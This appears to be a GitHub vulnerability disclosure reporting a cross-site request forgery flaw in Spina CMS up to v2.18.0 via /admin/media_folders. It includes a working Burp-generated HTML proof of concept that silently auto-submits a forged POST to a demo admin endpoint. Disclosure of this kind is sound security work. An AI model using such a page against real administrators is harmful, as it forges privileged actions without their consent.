[description]

Spina CMS v2.18.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the URI /admin/media_folders.

[Vulnerability Type]

Cross-Site Request Forgery (CSRF)

[Vendor of Product]

Spina CMS,https://github.com/SpinaCMS/Spina

[Affected Product Code Base]

<=v2.18.0

[Impact Escalation of Privileges]

true

[POC]

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://spinacms-demo.herokuapp.com/admin/media_folders" method="POST">
      <input type="hidden" name="utf8" value="â&#156;&#147;" />
      <input type="hidden" name="authenticity&#95;token" value="YHbA&#47;a9JxqaH6dBpw3EnP&#47;vL2WzJM6L8obuUr1uIhkUlET&#47;JRM987f66bvcMD8BHXIsfY0WLMinCaXd&#43;k&#43;Ka7Q&#61;&#61;" />
      <input type="hidden" name="media&#95;folder&#91;name&#93;" value="123" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Files

README.md

Latest commit

History

README.md

File metadata and controls